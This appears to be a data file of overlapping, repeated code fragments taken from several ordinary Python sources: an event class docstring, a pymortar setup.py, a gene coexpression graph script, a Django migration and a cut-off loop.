"generated. :type history: BoboHistory :param data: The event data, defaults to an empty",
"Dict[str, str] = None, event_id: str = None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id)",
":type event_id: str, optional \"\"\" NAME = \"name\" HISTORY = \"history\" def __init__(self,",
":param data: The event data, defaults to an empty dict. :type data: Dict[str,",
"an empty dict. :type data: Dict[str, str], optional :param event_id: The event ID,",
"dict. :type data: Dict[str, str], optional :param event_id: The event ID, defaults to",
"name. :type name: str :param history: The history of events that caused the",
"Dict[str, str], optional :param event_id: The event ID, defaults to a randomly generated",
"event_id: str, optional \"\"\" NAME = \"name\" HISTORY = \"history\" def __init__(self, timestamp:",
"str] = None, event_id: str = None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name",
"The event data, defaults to an empty dict. :type data: Dict[str, str], optional",
"str], optional :param event_id: The event ID, defaults to a randomly generated ID.",
"def to_dict(self) -> dict: \"\"\" :return: A dict representation of the object. \"\"\"",
"str :param history: The history of events that caused the composite event to",
"a randomly generated ID. :type event_id: str, optional \"\"\" NAME = \"name\" HISTORY",
"composite event. :param timestamp: The event timestamp indicating when it was first generated.",
"it was first generated. :type timestamp: int :param name: The event name. :type",
"defaults to an empty dict. :type data: Dict[str, str], optional :param event_id: The",
"to be generated. :type history: BoboHistory :param data: The event data, defaults to",
"BoboHistory :param data: The event data, defaults to an empty dict. :type data:",
"timestamp indicating when it was first generated. :type timestamp: int :param name: The",
"event_id: str = None) -> None: super().__init__(timestamp=timestamp, data=data, event_id=event_id) self.name = name self.history",
"first generated. :type timestamp: int :param name: The event name. :type name: str",
"event. :param timestamp: The event timestamp indicating when it was first generated. :type",
"The history of events that caused the composite event to be generated. :type",
"BoboEvent from bobocep.rules.events.histories.bobo_history import BoboHistory class CompositeEvent(BoboEvent): \"\"\"A composite event. :param timestamp: The",
"to a randomly generated ID. :type event_id: str, optional \"\"\" NAME = \"name\"",
"BoboHistory, data: Dict[str, str] = None, event_id: str = None) -> None: super().__init__(timestamp=timestamp,",
"history: The history of events that caused the composite event to be generated."
] |
[
"print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[",
"long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language :: Python :: 3\", ], )",
"\"r\") as fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3",
"version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language ::",
"author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language :: Python",
"author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language :: Python ::",
"import setuptools with open(\"README.md\", \"r\") as fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\",",
"open(\"README.md\", \"r\") as fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\",",
"with open(\"README.md\", \"r\") as fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\",",
"setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming",
"fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(),",
"name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language",
"setuptools with open(\"README.md\", \"r\") as fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\",",
"Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language :: Python :: 3\", ],",
"= fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\",",
"as fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\",",
"fh: long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description,",
"long_description = fh.read() print(setuptools.find_packages()) setuptools.setup( name=\"pymortar\", version=\"0.1.4\", author=\"<NAME>\", author_email=\"<EMAIL>\", description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\",",
"description=\"Python3 Mortar\", long_description=long_description, long_description_content_type=\"text/markdown\", url=\"https://github.com/mortar-frontend\", packages=setuptools.find_packages(), classifiers=[ \"Programming Language :: Python :: 3\","
] |
[
"< len(content_unshared) - 1: # file.write('\\n') # ind += 1 # file.close() #",
"histogram from network import GData from network import Graph # # read the",
"atoms: # content_unshared.append(line) # print(len(content_unshared)) # # # save the sub network #",
"0 # for line in content_unshared: # file.write(line) # if ind < len(content_unshared)",
"math import numpy as np import pandas as pd import matplotlib.pyplot as plt",
"# ind = 0 # for line in content_unshared: # file.write(line) # if",
"visualizer import histogram from network import GData from network import Graph # #",
"'../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') # content = file.read().splitlines() # file.close() #",
"data, exclude mitochondrial and ribosomal genes exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data,",
"= line.split(' ') # atom = (tokens[0], int(tokens[1])) # if atom in atoms:",
"open(filename, 'w') # ind = 0 # for line in content_unshared: # file.write(line)",
"import os import sys sys.path.append('../../python') from instance import Instance import visualizer import histogram",
"the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') #",
"filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') # content = file.read().splitlines() #",
"print(len(content_unshared)) # # # save the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' #",
"import visualizer import histogram from network import GData from network import Graph #",
"= open(filename, 'w') # ind = 0 # for line in content_unshared: #",
"line.split(' ') # atom = (tokens[0], int(tokens[1])) # if atom in atoms: #",
"GData from network import Graph # # read the atoms from the file",
"atom in atoms: # content_unshared.append(line) # print(len(content_unshared)) # # # save the sub",
"# for elt in content: # tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1])))",
"save the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w')",
"= 0 # for line in content_unshared: # file.write(line) # if ind <",
"network import Graph # # read the atoms from the file # filename",
"'../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression network') #",
"n_cell_min, score_min) graph = Graph('sub coexpression network') # build graph from raw data,",
"= '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') # content = file.read().splitlines() # file.close()",
"as pd import matplotlib.pyplot as plt import os import sys sys.path.append('../../python') from instance",
"file # filename = 'atoms_unshared.txt' # file = open(filename, 'r') # content =",
"file.read().splitlines() # file.close() # # content_unshared = [] # # for line in",
"# # for line in content: # tokens = line.split(' ') # atom",
"# # save the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file =",
"# file.write(line) # if ind < len(content_unshared) - 1: # file.write('\\n') # ind",
"elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # # # read the coexpression graph #",
"import sys sys.path.append('../../python') from instance import Instance import visualizer import histogram from network",
"plt import os import sys sys.path.append('../../python') from instance import Instance import visualizer import",
"open(filename, 'r') # content = file.read().splitlines() # file.close() # # content_unshared = []",
"= elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # # # read the coexpression graph",
"= open(filename, 'r') # content = file.read().splitlines() # file.close() # # content_unshared =",
"# content_unshared.append(line) # print(len(content_unshared)) # # # save the sub network # filename",
"the file # filename = 'atoms_unshared.txt' # file = open(filename, 'r') # content",
"file = open(filename, 'w') # ind = 0 # for line in content_unshared:",
"from the file # filename = 'atoms_unshared.txt' # file = open(filename, 'r') #",
"= '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression network')",
"graph') col_option = 'clustering_colors' fig, ax = plt.subplots() graph.plot(ax, col_option, False) ax.set_title('Coexpression graph')",
"True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the coexpression graph",
"tokens = line.split(' ') # atom = (tokens[0], int(tokens[1])) # if atom in",
"content = file.read().splitlines() # file.close() # # content_unshared = [] # # for",
"file.write('\\n') # ind += 1 # file.close() # create a sub coexpression graph",
"= [] # for elt in content: # tokens = elt.split(' ') #",
"graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') # content =",
"1 # file.close() # create a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min",
"genes exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() #",
"') # atoms.append((tokens[0], int(tokens[1]))) # # # read the coexpression graph # filename",
"coexpression graph') col_option = 'clustering_colors' fig, ax = plt.subplots() graph.plot(ax, col_option, False) ax.set_title('Coexpression",
"= GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression network') # build graph",
"Graph('sub coexpression network') # build graph from raw data, exclude mitochondrial and ribosomal",
"# filename = 'atoms_unshared.txt' # file = open(filename, 'r') # content = file.read().splitlines()",
"# atoms = [] # for elt in content: # tokens = elt.split('",
"the atoms from the file # filename = 'atoms_unshared.txt' # file = open(filename,",
"louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min)",
"1: # file.write('\\n') # ind += 1 # file.close() # create a sub",
"filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the",
"ind += 1 # file.close() # create a sub coexpression graph input_file =",
"') # atom = (tokens[0], int(tokens[1])) # if atom in atoms: # content_unshared.append(line)",
"#!/usr/bin/python import math import numpy as np import pandas as pd import matplotlib.pyplot",
"import Instance import visualizer import histogram from network import GData from network import",
"graph = Graph('sub coexpression network') # build graph from raw data, exclude mitochondrial",
"'../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') # ind = 0 # for line",
"<gh_stars>1-10 #!/usr/bin/python import math import numpy as np import pandas as pd import",
"[] # # for line in content: # tokens = line.split(' ') #",
"content_unshared.append(line) # print(len(content_unshared)) # # # save the sub network # filename =",
"atoms = [] # for elt in content: # tokens = elt.split(' ')",
"# read the atoms from the file # filename = 'atoms_unshared.txt' # file",
"import math import numpy as np import pandas as pd import matplotlib.pyplot as",
"# tokens = line.split(' ') # atom = (tokens[0], int(tokens[1])) # if atom",
"+= 1 # file.close() # create a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt'",
"'atoms_unshared.txt' # file = open(filename, 'r') # content = file.read().splitlines() # file.close() #",
"filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') # ind = 0 #",
"= 1 score_min = 0.005 louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data",
"# output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub",
"# # # save the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file",
"[] # for elt in content: # tokens = elt.split(' ') # atoms.append((tokens[0],",
"graph.save(output_file) # display the coexpression graph print('display the coexpression graph') col_option = 'clustering_colors'",
"# file.write('\\n') # ind += 1 # file.close() # create a sub coexpression",
"0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph =",
"# file.close() # # content_unshared = [] # # for line in content:",
"content: # tokens = line.split(' ') # atom = (tokens[0], int(tokens[1])) # if",
"Instance import visualizer import histogram from network import GData from network import Graph",
"numpy as np import pandas as pd import matplotlib.pyplot as plt import os",
"in atoms: # content_unshared.append(line) # print(len(content_unshared)) # # # save the sub network",
"print('display the coexpression graph') col_option = 'clustering_colors' fig, ax = plt.subplots() graph.plot(ax, col_option,",
"col_option = 'clustering_colors' fig, ax = plt.subplots() graph.plot(ax, col_option, False) ax.set_title('Coexpression graph') plt.show()",
"from raw data, exclude mitochondrial and ribosomal genes exclude_mt_rp = True filter_edges =",
"graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the coexpression graph print('display",
"ind < len(content_unshared) - 1: # file.write('\\n') # ind += 1 # file.close()",
"# for line in content_unshared: # file.write(line) # if ind < len(content_unshared) -",
"sys.path.append('../../python') from instance import Instance import visualizer import histogram from network import GData",
"the coexpression graph print('display the coexpression graph') col_option = 'clustering_colors' fig, ax =",
"content = file.read().splitlines() # file.close() # atoms = [] # for elt in",
"exclude mitochondrial and ribosomal genes exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp,",
"# graph.save(output_file) # display the coexpression graph print('display the coexpression graph') col_option =",
"os import sys sys.path.append('../../python') from instance import Instance import visualizer import histogram from",
"read the atoms from the file # filename = 'atoms_unshared.txt' # file =",
"file.close() # create a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1",
"'r') # content = file.read().splitlines() # file.close() # # content_unshared = [] #",
"import Graph # # read the atoms from the file # filename =",
"# # content_unshared = [] # # for line in content: # tokens",
"if ind < len(content_unshared) - 1: # file.write('\\n') # ind += 1 #",
"raw data, exclude mitochondrial and ribosomal genes exclude_mt_rp = True filter_edges = True",
"output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression",
"the coexpression graph') col_option = 'clustering_colors' fig, ax = plt.subplots() graph.plot(ax, col_option, False)",
"graph print('display the coexpression graph') col_option = 'clustering_colors' fig, ax = plt.subplots() graph.plot(ax,",
"sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005 louvain_param",
"(tokens[0], int(tokens[1])) # if atom in atoms: # content_unshared.append(line) # print(len(content_unshared)) # #",
"import matplotlib.pyplot as plt import os import sys sys.path.append('../../python') from instance import Instance",
"as plt import os import sys sys.path.append('../../python') from instance import Instance import visualizer",
"# save the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename,",
"file.write(line) # if ind < len(content_unshared) - 1: # file.write('\\n') # ind +=",
"exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the coexpression graph print('display the",
"content_unshared = [] # # for line in content: # tokens = line.split('",
"coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') # content",
"pandas as pd import matplotlib.pyplot as plt import os import sys sys.path.append('../../python') from",
"import pandas as pd import matplotlib.pyplot as plt import os import sys sys.path.append('../../python')",
"from instance import Instance import visualizer import histogram from network import GData from",
"network import GData from network import Graph # # read the atoms from",
"build graph from raw data, exclude mitochondrial and ribosomal genes exclude_mt_rp = True",
"# atom = (tokens[0], int(tokens[1])) # if atom in atoms: # content_unshared.append(line) #",
"import numpy as np import pandas as pd import matplotlib.pyplot as plt import",
"# display the coexpression graph print('display the coexpression graph') col_option = 'clustering_colors' fig,",
"elt in content: # tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # #",
"line in content: # tokens = line.split(' ') # atom = (tokens[0], int(tokens[1]))",
"int(tokens[1])) # if atom in atoms: # content_unshared.append(line) # print(len(content_unshared)) # # #",
"# atoms.append((tokens[0], int(tokens[1]))) # # # read the coexpression graph # filename =",
"for line in content: # tokens = line.split(' ') # atom = (tokens[0],",
"True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display",
"file.read().splitlines() # file.close() # atoms = [] # for elt in content: #",
"score_min) graph = Graph('sub coexpression network') # build graph from raw data, exclude",
"'w') # ind = 0 # for line in content_unshared: # file.write(line) #",
"# # read the atoms from the file # filename = 'atoms_unshared.txt' #",
"= [] # # for line in content: # tokens = line.split(' ')",
"# create a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min",
"# print(len(content_unshared)) # # # save the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt'",
"= True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the coexpression",
"n_cell_min = 1 score_min = 0.005 louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt'",
"= 'atoms_unshared.txt' # file = open(filename, 'r') # content = file.read().splitlines() # file.close()",
"score_min = 0.005 louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData()",
"# filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r') # content = file.read().splitlines()",
"# file.close() # atoms = [] # for elt in content: # tokens",
"tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # # # read the coexpression",
"data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression network') # build graph from raw",
"# file = open(filename, 'w') # ind = 0 # for line in",
"for line in content_unshared: # file.write(line) # if ind < len(content_unshared) - 1:",
"int(tokens[1]))) # # # read the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' #",
"1 score_min = 0.005 louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data =",
"file = open(filename, 'r') # content = file.read().splitlines() # file.close() # atoms =",
"matplotlib.pyplot as plt import os import sys sys.path.append('../../python') from instance import Instance import",
"= file.read().splitlines() # file.close() # # content_unshared = [] # # for line",
"# if ind < len(content_unshared) - 1: # file.write('\\n') # ind += 1",
"atoms.append((tokens[0], int(tokens[1]))) # # # read the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt'",
"atom = (tokens[0], int(tokens[1])) # if atom in atoms: # content_unshared.append(line) # print(len(content_unshared))",
"pd import matplotlib.pyplot as plt import os import sys sys.path.append('../../python') from instance import",
"file.close() # # content_unshared = [] # # for line in content: #",
"in content: # tokens = line.split(' ') # atom = (tokens[0], int(tokens[1])) #",
"mitochondrial and ribosomal genes exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges)",
"content: # tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # # # read",
"coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005 louvain_param =",
"coexpression network') # build graph from raw data, exclude mitochondrial and ribosomal genes",
"# for line in content: # tokens = line.split(' ') # atom =",
"= (tokens[0], int(tokens[1])) # if atom in atoms: # content_unshared.append(line) # print(len(content_unshared)) #",
"input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005 louvain_param = 0.7 #",
"- 1: # file.write('\\n') # ind += 1 # file.close() # create a",
"# file = open(filename, 'r') # content = file.read().splitlines() # file.close() # atoms",
"and ribosomal genes exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param)",
"for elt in content: # tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) #",
"= 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph",
"network') # build graph from raw data, exclude mitochondrial and ribosomal genes exclude_mt_rp",
"# if atom in atoms: # content_unshared.append(line) # print(len(content_unshared)) # # # save",
"= True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) #",
"'r') # content = file.read().splitlines() # file.close() # atoms = [] # for",
"# content = file.read().splitlines() # file.close() # # content_unshared = [] # #",
"# read the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename,",
"ind = 0 # for line in content_unshared: # file.write(line) # if ind",
"# tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # # # read the",
"0.005 louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file, n_cell_min,",
"coexpression graph print('display the coexpression graph') col_option = 'clustering_colors' fig, ax = plt.subplots()",
"len(content_unshared) - 1: # file.write('\\n') # ind += 1 # file.close() # create",
"# file = open(filename, 'r') # content = file.read().splitlines() # file.close() # #",
"data = GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression network') # build",
"'../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005 louvain_param = 0.7 # output_file =",
"in content: # tokens = elt.split(' ') # atoms.append((tokens[0], int(tokens[1]))) # # #",
"= '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') # ind = 0 # for",
"display the coexpression graph print('display the coexpression graph') col_option = 'clustering_colors' fig, ax",
"# # # read the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file",
"the sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') #",
"Graph # # read the atoms from the file # filename = 'atoms_unshared.txt'",
"network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') # ind =",
"# ind += 1 # file.close() # create a sub coexpression graph input_file",
"graph.compute_positions() # graph.save(output_file) # display the coexpression graph print('display the coexpression graph') col_option",
"filename = 'atoms_unshared.txt' # file = open(filename, 'r') # content = file.read().splitlines() #",
"file.close() # atoms = [] # for elt in content: # tokens =",
"# filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') # ind = 0",
"# build graph from raw data, exclude mitochondrial and ribosomal genes exclude_mt_rp =",
"graph from raw data, exclude mitochondrial and ribosomal genes exclude_mt_rp = True filter_edges",
"# content = file.read().splitlines() # file.close() # atoms = [] # for elt",
"# content_unshared = [] # # for line in content: # tokens =",
"line in content_unshared: # file.write(line) # if ind < len(content_unshared) - 1: #",
"graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the coexpression graph print('display the coexpression graph')",
"sub network # filename = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' # file = open(filename, 'w') # ind",
"np import pandas as pd import matplotlib.pyplot as plt import os import sys",
"if atom in atoms: # content_unshared.append(line) # print(len(content_unshared)) # # # save the",
"# file.close() # create a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min =",
"filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file) # display the coexpression graph print('display the coexpression",
"from network import GData from network import Graph # # read the atoms",
"instance import Instance import visualizer import histogram from network import GData from network",
"content_unshared: # file.write(line) # if ind < len(content_unshared) - 1: # file.write('\\n') #",
"create a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min =",
"= Graph('sub coexpression network') # build graph from raw data, exclude mitochondrial and",
"atoms from the file # filename = 'atoms_unshared.txt' # file = open(filename, 'r')",
"import histogram from network import GData from network import Graph # # read",
"= open(filename, 'r') # content = file.read().splitlines() # file.close() # atoms = []",
"import GData from network import Graph # # read the atoms from the",
"file = open(filename, 'r') # content = file.read().splitlines() # file.close() # # content_unshared",
"= '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005 louvain_param = 0.7 # output_file",
"= 0.005 louvain_param = 0.7 # output_file = '../../dataset/Imagine/coexpression/coexpression_graph_sub_test_dynamics.txt' data = GData() data.load_from_file(input_file,",
"a sub coexpression graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005",
"from network import Graph # # read the atoms from the file #",
"# # read the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file =",
"ribosomal genes exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions()",
"in content_unshared: # file.write(line) # if ind < len(content_unshared) - 1: # file.write('\\n')",
"GData() data.load_from_file(input_file, n_cell_min, score_min) graph = Graph('sub coexpression network') # build graph from",
"as np import pandas as pd import matplotlib.pyplot as plt import os import",
"graph input_file = '../../dataset/Imagine/coexpression/coexpression_network_sub_test_dynamics.txt' n_cell_min = 1 score_min = 0.005 louvain_param = 0.7",
"open(filename, 'r') # content = file.read().splitlines() # file.close() # atoms = [] #",
"= file.read().splitlines() # file.close() # atoms = [] # for elt in content:",
"read the coexpression graph # filename = '../../dataset/Imagine/coexpression/coexpression_network.txt' # file = open(filename, 'r')",
"exclude_mt_rp = True filter_edges = True graph.create_from_gdata(data, exclude_mt_rp, filter_edges) graph.compute_clusters(louvain_param) graph.compute_positions() # graph.save(output_file)",
"sys sys.path.append('../../python') from instance import Instance import visualizer import histogram from network import"
] |
[
"migrations class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations = [ migrations.RenameField(",
"Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations = [ migrations.RenameField( model_name='emailheaders', old_name='receiver',",
"# Generated by Django 3.1.6 on 2021-04-25 06:35 from django.db import migrations class",
"Generated by Django 3.1.6 on 2021-04-25 06:35 from django.db import migrations class Migration(migrations.Migration):",
"on 2021-04-25 06:35 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('emails',",
"<reponame>SamirM-BE/ErasMail # Generated by Django 3.1.6 on 2021-04-25 06:35 from django.db import migrations",
"[ ('emails', '0042_auto_20210423_0844'), ] operations = [ migrations.RenameField( model_name='emailheaders', old_name='receiver', new_name='owner', ), ]",
"class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations = [ migrations.RenameField( model_name='emailheaders',",
"= [ ('emails', '0042_auto_20210423_0844'), ] operations = [ migrations.RenameField( model_name='emailheaders', old_name='receiver', new_name='owner', ),",
"dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations = [ migrations.RenameField( model_name='emailheaders', old_name='receiver', new_name='owner',",
"from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations",
"2021-04-25 06:35 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'),",
"Django 3.1.6 on 2021-04-25 06:35 from django.db import migrations class Migration(migrations.Migration): dependencies =",
"import migrations class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations = [",
"3.1.6 on 2021-04-25 06:35 from django.db import migrations class Migration(migrations.Migration): dependencies = [",
"06:35 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ]",
"by Django 3.1.6 on 2021-04-25 06:35 from django.db import migrations class Migration(migrations.Migration): dependencies",
"django.db import migrations class Migration(migrations.Migration): dependencies = [ ('emails', '0042_auto_20210423_0844'), ] operations ="
] |
[
"while c != 0: c -= 1 num1, sign1, num2, sign2, ans =",
